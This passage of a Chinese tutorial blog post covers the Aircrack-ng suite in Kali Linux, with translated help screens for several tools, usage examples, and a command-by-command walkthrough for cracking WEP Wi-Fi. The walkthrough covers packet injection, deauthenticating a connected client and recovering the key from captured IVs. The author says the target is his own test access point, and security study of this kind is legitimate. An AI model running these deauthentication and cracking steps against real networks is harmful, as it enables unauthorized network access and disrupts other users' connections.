root@kali:~# packetforge-ng --helpPacketforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'OtreppeOriginal work: Martin Beckhttp://www.aircrack-ng.orgUsage: packetforge-ng <mode> <options>伪造的选项:-p <fctrl>     : 设置帧控制字 (hex)-a <bssid>     : 设置接入点MAC地址-c <dmac>      : 设置目的MAC地址-h <smac>      : 设置源MAC地址-j             : 设置FromDS位-o             : 清除ToDS位-e             : 禁用WEP加密-k <ip[:port]> : 设置目的IP [Port]-l <ip[:port]> : 设置源IP [Port]-t ttl         : 设置生活时间-w <file>      : 将数据包写入该pcap文件-s <size>      : 指定空数据包的大小-n <packets>   : 设置要生成的数据包数源选项:-r <file>      : 从这个原始文件读取数据包-y <file>      : 从这个文件读取PRGA模式:--arp          : 伪造ARP报文    (-0)--udp          : 伪造UDP数据包    (-1)--icmp         : 伪造ICMP数据包   (-2)--null         : 构建一个空数据包    (-3)--custom       : 构建一个自定义数据包  (-9)--help         : 显示帮助


21、tkiptun-ng – 该工具能够将几帧注入具有QoS的WPA TKIP网络

root@kali:~# tkiptun-ng --helpTkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: tkiptun-ng <options> <replay interface>Filter options:-d dmac   : MAC address, Destination-s smac   : MAC address, Source-m len    : minimum packet length (default: 80)-n len    : maximum packet length (default: 80)-t tods   : frame control, To      DS bit-f fromds : frame control, From    DS bit-D        : disable AP detection-Z        : select packets manuallyReplay options:-x nbpps  : number of packets per second-a bssid  : set Access Point MAC address-c dmac   : set Destination  MAC address-h smac   : set Source       MAC address-e essid  : set target AP SSID-M sec    : MIC error timout in seconds [60]Debug options:-K prga   : keystream for continuation-y file   : keystream-file for continuation-j        : inject FromDS packets-P pmk    : pmk for verification/vuln testing-p psk    : psk to calculate pmk with essidsource options:-i iface  : capture packets from this interface-r file   : extract packets from this pcap file--help              : Displays this usage screen



中文对照版:

root@kali:~# tkiptun-ng --helpTkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppehttp://www.aircrack-ng.orgusage: tkiptun-ng <options> <replay interface>过滤选项:-d dmac   : MAC地址,目的地址-s smac   : MAC地址,来源-m len    : 最小包长度 (default: 80)-n len    : 最大包长度 (default: 80)-t tods   : 帧控制,到DS位-f fromds : 帧控制,从DS位-D        : 禁用AP检测-Z        : 手动选择数据包重播选项:-x nbpps  : 每秒数据包数-a bssid  : 设置接入点MAC地址-c dmac   : 设置目的MAC地址-h smac   : 设置源MAC地址-e essid  : 设置目标AP SSID-M sec    : MIC错误超时(秒)[60]调试选项:-K prga   : 密钥流的延续-y file   : 连续性的密钥文件-j        : 注入FromDS数据包-P pmk    : pmk进行验证/测试-p psk    : psk用essid计算pmk源选项:-i iface  : 从该接口捕获数据包-r file   : 从这个pcap文件中提取数据包--help    :显示帮助 


22、wesside-ng – 自动魔法工具,融合了无数获得WEP密钥的技术
root@kali:~# wesside-ng -hWesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: wesside-ng <options>Options:-h              : This help screen-i      <iface> : Interface to use (mandatory)-m      <my ip> : My IP address-n     <net ip> : Network IP address-a      <mymac> : Source MAC Address-c              : Do not crack the key-p   <min prga> : Minimum bytes of PRGA to gather-v <victim mac> : Victim BSSID-t  <threshold> : Cracking threshold-f   <max chan> : Highest scanned chan (default: 11)-k      <txnum> : Ignore acks and tx txnum times


中文对照版:
root@kali:~# wesside-ng -hWesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittauhttp://www.aircrack-ng.orgUsage: wesside-ng <options>选项:-h              : 显示帮助-i      <iface> : 使用界面 (强制性)-m      <my ip> : 我的IP地址-n     <net ip> : 网络IP地址-a      <mymac> : 源MAC地址-c              : 不要破解钥匙-p   <min prga> : PRGA的最小字节收集-v <victim mac> : 受害者BSSID-t  <threshold> : Cracking threshold 破裂门槛-f   <max chan> : 最高扫描 (default: 11)-k      <txnum> : Ignore acks and tx txnum times 忽略ack和tx txnum次

23、wpaclean – 从pcap文件中删除多余的数据

root@kali:~# wpaclean
Usage: wpaclean <out.cap> <in.cap> [in2.cap] [...]


三、示例


airdriver-ng 使用示例

root@kali:~# airdriver-ng detectUSB devices (generic detection):
Bus 002 Device 009: ID 0846:9001 NetGear, Inc. WN111(v2) RangeMax Next Wireless [Atheros AR9170+AR9101]
Bus 001 Device 012: ID 050d:0017 Belkin Components B8T017 Bluetooth+EDR 2.1
Bus 001 Device 005: ID 0e0f:0008 VMware, Inc.


airmon-ng 使用示例


所需通道上无线接口(wlan0)上的启动(启动)监视模式(6):

root@kali:~# airmon-ng start wlan0 6Interface   Chipset     Driverwlan0       2-2: Atheros    carl9170 - [phy4](monitor mode enabled on mon0)

airodump-ng 使用示例

使用监视器模式界面(mon0),将通道6(-c 6)上的嗅探器(BSSID)(-bssid 38:60:77:23:B1:CB)进行过滤,将捕获写入磁盘(-w capture):

root@kali:~# airodump-ng -c 6 --bssid 38:60:77:23:B1:CB -w capture mon0CH  6 ][ Elapsed: 4 s ][ 2014-05-15 17:21                                         BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID38:60:77:23:B1:CB  -79   0        7        0    0   6  54e  WPA2 CCMP   PSK  6EA10E                                                                       BSSID              STATION            PWR   Rate    Lost    Frames  Probe


aircrack-ng 使用示例

使用提供的词库(-w /usr/share/wordlists/nmap.lst)尝试破解捕获文件(capture-01.cap)中的密码:
root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap 
Opening capture-01.cap
Read 2 packets.#  BSSID              ESSID                     Encryption1  38:60:77:23:B1:CB  6EA10E                    No data - WEP or WPAChoosing first network as target.Opening capture-01.cap



四、实战Aircrack-ng破解WEB加密


Aircark-ng工具包简单介绍:

aircrack-ng 破解
airmon-ng 改变网卡工作模式(启动监听模式)
airodump-ng 捕获报文
aireplay-ng 提供各种攻击,为airodump-ng创造更多的报文
airserv-ng 网卡连接到指定端口,可用来做无线跳板
airolib-ng 彩虹表破解创建数据库文件
airdecap-ng 解包


先查看下网卡信息:


root@kali:~# ifconfig




然后监听网卡


root@kali:~# airmon-ng start wlan0



然后扫描附近WIFI,找到一个采用WEP加密的wifi,这个wifi是我用来测试用的


root@kali:~# airodump-ng wlan0mon




然后执行下面的命令


格式为: 其中-c是上面对应的信道,--ignore-negative-on是将 WPA 握手包替换为固定的频道信息

airodump-ng -c [channel] --bssid [ap's mac] -w [保存的文件名]  wlan0mon --ignore-negative-on


root@kali:~# airodump-ng -c 6 -w wse --ivs --bssid EC:88:8F:F5:9C:20 wlan0mon




各参数介绍:

BSSID AP的MAC
PWR 信号强度
Beacons 无线ap发的通知 周期发送
#Data 抓到的数据包
CH channel 信道
MB 数字表示最大传输速率(网络标准),e表示802.11e
,"."表示短前导码。


注:前导码是数据包的一组比特组,用来让接受者同步
并准备接受实际的数据


ENC 加密方式
CIPHER 加密算法 WPA-TKIP WPA2-CCMP
AUTH 认证MGT PSK OPN开放 pre-shared key
ESSID 通俗之wifi名字<length:8>这样的表示未广播


STATION 客户端
RATE 传输率 比如300M无线路由器
Lost 最近的10秒内的丢失包数 seq tcp
frames 来自客户端的数据包
Probe 主动探测


开始攻击


root@kali:~# aireplay-ng -3 -b EC:88:8F:F5:9C:20 -h A4:44:D1:1B:D2:85 wlan0mon




然后用以下命令是上面的客户端下线,让他从新连接,


aireplay-ng -0 10 -a [ap's mac] -c [客户端 mac] --ignore-negative-on wlan0mon


root@kali:~# aireplay-ng -0 19 -a EC:88:8F:F5:9C:20 -c A4:44:D1:1B:D2:85 wlan0mon



然后等客户端从新连接上这个wifi,只要有客户端一连接这个wifi,aireplay-ng就开始破解了




然后观察#Data与Frames这两个数据包,当他们到达一定的数量就可以,破解密码了




然后启动aircrack-ng开始破解密码


root@kali:~# aircrack-ng wse-01.ivs 




密码成功被破解出来!!!

其中: IVS越大越能提高破解密码的成功率。

这篇关于Kali-WIFI攻防(二)----无线网络分析工具Aircrack-ng的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1068642

相关文章

揭秘未来艺术:AI绘画工具全面介绍

📑前言 随着科技的飞速发展,人工智能(AI)已经逐渐渗透到我们生活的方方面面。在艺术创作领域,AI技术同样展现出了其独特的魅力。今天,我们就来一起探索这个神秘而引人入胜的领域,深入了解AI绘画工具的奥秘及其为艺术创作带来的革命性变革。 一、AI绘画工具的崛起 1.1 颠覆传统绘画模式 在过去,绘画是艺术家们通过手中的画笔,蘸取颜料,在画布上自由挥洒的创造性过程。然而,随着AI绘画工

墨刀原型工具-小白入门篇

墨刀原型工具-小白入门篇 简介 随着互联网的发展和用户体验的重要性越来越受到重视,原型设计逐渐成为了产品设计中的重要环节。墨刀作为一款原型设计工具,以其简洁、易用的特点,受到了很多设计师的喜爱。本文将介绍墨刀原型工具的基本使用方法,以帮助小白快速上手。 第一章:认识墨刀原型工具 1.1 什么是墨刀原型工具 墨刀是一款基于Web的原型设计工具,可以帮助设计师快速创建交互原型,并且可以与团队

大学湖北中医药大学法医学试题及答案,分享几个实用搜题和学习工具 #微信#学习方法#职场发展

今天分享拥有拍照搜题、文字搜题、语音搜题、多重搜题等搜题模式,可以快速查找问题解析,加深对题目答案的理解。 1.快练题 这是一个网站 找题的网站海量题库,在线搜题,快速刷题~为您提供百万优质题库,直接搜索题库名称,支持多种刷题模式:顺序练习、语音听题、本地搜题、顺序阅读、模拟考试、组卷考试、赶快下载吧! 2.彩虹搜题 这是个老公众号了 支持手写输入,截图搜题,详细步骤,解题必备

[职场] 公务员的利弊分析 #知识分享#经验分享#其他

公务员的利弊分析     公务员作为一种稳定的职业选择,一直备受人们的关注。然而,就像任何其他职业一样,公务员职位也有其利与弊。本文将对公务员的利弊进行分析,帮助读者更好地了解这一职业的特点。 利: 1. 稳定的职业:公务员职位通常具有较高的稳定性,一旦进入公务员队伍,往往可以享受到稳定的工作环境和薪资待遇。这对于那些追求稳定的人来说,是一个很大的优势。 2. 薪资福利优厚:公务员的薪资和

Windows/macOS/Linux 安装 Redis 和 Redis Desktop Manager 可视化工具

本文所有安装都在macOS High Sierra 10.13.4进行,Windows安装相对容易些,Linux安装与macOS类似,文中会做区分讲解 1. Redis安装 1.下载Redis https://redis.io/download 把下载的源码更名为redis-4.0.9-source,我喜欢跟maven、Tomcat放在一起,就放到/Users/zhan/Documents

高度内卷下,企业如何通过VOC(客户之声)做好竞争分析?

VOC,即客户之声,是一种通过收集和分析客户反馈、需求和期望,来洞察市场趋势和竞争对手动态的方法。在高度内卷的市场环境下,VOC不仅能够帮助企业了解客户的真实需求,还能为企业提供宝贵的竞争情报,助力企业在竞争中占据有利地位。 那么,企业该如何通过VOC(客户之声)做好竞争分析呢?深圳天行健企业管理咨询公司解析如下: 首先,要建立完善的VOC收集机制。这包括通过线上渠道(如社交媒体、官网留言

OpenCompass:大模型测评工具

大模型相关目录 大模型,包括部署微调prompt/Agent应用开发、知识库增强、数据库增强、知识图谱增强、自然语言处理、多模态等大模型应用开发内容 从0起步,扬帆起航。 大模型应用向开发路径:AI代理工作流大模型应用开发实用开源项目汇总大模型问答项目问答性能评估方法大模型数据侧总结大模型token等基本概念及参数和内存的关系大模型应用开发-华为大模型生态规划从零开始的LLaMA-Factor

简鹿文件批量重命名:一款文件批量改名高手都在用的工具

作为 IT 行业的搬砖民工,互联网的数据量爆炸性增长,文件管理成为了一项日益重要的任务。"简鹿文件批量重命名"应运而生,旨在为用户提供一个高效、灵活的解决方案,以应对繁琐的文件命名、排序、创建及属性修改等挑战。 这款软件凭借其一键式操作、强大的自定义规则导入、以及全面的批量处理能力,极大地简化了文件管理流程,尤其适合处理大量文件的个人用户及企业环境,是提高工作效率、保持文件系统整洁的得力助手

如何用外呼工具和CRM管理系统形成销售闭环

使用外呼工具和CRM管理系统形成销售闭环是一个系统性的过程,它涉及客户数据的整合、个性化的营销活动、销售与市场活动的协作、顾客行为的追踪与理解以及营销成效的评估与优化等多个环节。 以下是如何将外呼工具和CRM管理系统有效结合以形成销售闭环的步骤: 1. 客户数据的整合与分析    - 外呼工具在与客户进行初步沟通时,会收集到客户的基本信息和初步需求。    - 这些信息随后被输入到CRM管

ASP.Net.WebAPI和工具PostMan

1.WebAPI概述 1.1 WebAPI WebAPI 是一种传统的方式,用于构建和暴露 RESTUI风格的Web服务。它提供了丰富的功能和灵活性,可以处理各种HTTP请求,并支持各种数据格式,如JSON、XML等。 WebAPI使用控制器(Controllers)和动作方法(ActionMethods)的概念、通过路由配置将请求映射到相应的方法上。 开发人员可以使用各种属性和过滤器来处